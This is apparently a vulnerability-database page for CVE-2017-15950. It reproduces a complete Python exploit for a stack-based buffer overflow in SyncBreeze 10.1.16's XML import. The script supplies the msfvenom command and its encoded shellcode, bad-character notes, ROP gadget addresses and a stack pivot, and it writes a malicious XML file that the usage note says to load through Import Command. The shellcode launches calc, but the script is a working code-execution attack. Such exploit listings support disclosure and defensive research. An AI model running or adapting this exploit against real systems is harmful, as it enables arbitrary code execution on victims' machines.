Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SyncBreeze 10.1.16 Buffer Overflow

🗓️ 29 Mar 2021 00:00:00Reported by Rafael MachadoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 307 Views

SyncBreeze 10.1.16 XML Buffer Overflow PO

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sync Breeze 10.1.16 Buffer Overflow Vulnerability
1 Nov 201700:00
zdt
0day.today		SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow Exploit
29 Mar 202100:00
zdt
Circl		CVE-2017-15950
14 Nov 202406:08
circl
CNVD		SyncBreeze Enterprise Arbitrary Code Execution Vulnerability
1 Nov 201700:00
cnvd
CVE		CVE-2017-15950
31 Oct 201714:00
cve
Cvelist		CVE-2017-15950
31 Oct 201714:00
cvelist
Exploit DB		SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
29 Mar 202100:00
exploitdb
NVD		CVE-2017-15950
31 Oct 201714:29
nvd
Prion		Buffer overflow
31 Oct 201714:29
prion
`# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow  
# Date: 03/27/2021  
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com  
# Vendor: https://www.syncbreeze.com/  
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html  
# Version: SyncBreeze v10.1.16 x86  
# Tested on: Windows 10 x64 (19042.867)  
# CVE: CVE-2017-15950  
  
Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file.   
  
# -*- coding: utf-8 -*-  
  
import struct  
  
# badchars  
#\x00\x0a\x0d\x20\x27  
#\x81\x82\x83\x84\x85\x86\x87\x88  
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90  
#\x91\x92\x93\x94\x95\x96\x97\x98  
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0  
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8  
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0  
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8  
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0  
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8  
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0  
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8  
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0  
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8  
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0  
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8  
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF  
  
# Shellcode payload size: 432 bytes  
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python  
  
shellcode = b""  
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"  
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"  
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"  
shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"  
shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"  
shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"  
shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"  
shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"  
shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"  
shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"  
shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"  
shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"  
shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"  
shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"  
shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"  
shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"  
shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"  
shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"  
shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"  
shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"  
shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"  
shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"  
shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"  
shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"  
shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"  
shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"  
shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"  
shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"  
shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"  
shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"  
shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"  
shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"  
shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"  
shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"  
shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"  
shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"  
shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"  
shellcode += b"\x30\x41\x41"  
  
  
# padding to crash buffer  
basura = struct.pack('<L', 0x41414141) * 390  
  
# gadgets to move payload pointer into EAX  
GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP  
GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX  
  
# padding to reach buffer address stored in ebp  
basura2 = struct.pack('<L', 0x41414141) * 56  
  
# padding for stack pivot  
  
padding = struct.pack('<L', 0x41414141) * 4  
padding2 = struct.pack('<L', 0x41414141) * 20  
  
# stack pivot to reach an area with more space for gadgets on the stack  
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret  
  
pivot = struct.pack('<L', 0x6506491c)  
  
# final payload  
  
fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode  
  
  
# write payload to xml file  
  
payload = open("xplSyncBreeze.xml", "wb")  
payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))  
  
payload.write("<sync name='".encode('utf-8'))  
payload.write(fruta)  
payload.write("'>\n</sync>\n".encode('utf-8'))  
  
payload.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Mar 2021 00:00Current
1Low risk
Vulners AI Score1
EPSS0.10414
syncbreezebuffer overflowexploit titlexml parsingstack-basedcve-2017-15950windows 10 x64pocshellcodemsfvenomx86windows/execalpha mixedbadcharsvendorsoftware linkversiontested onauthorimport command
307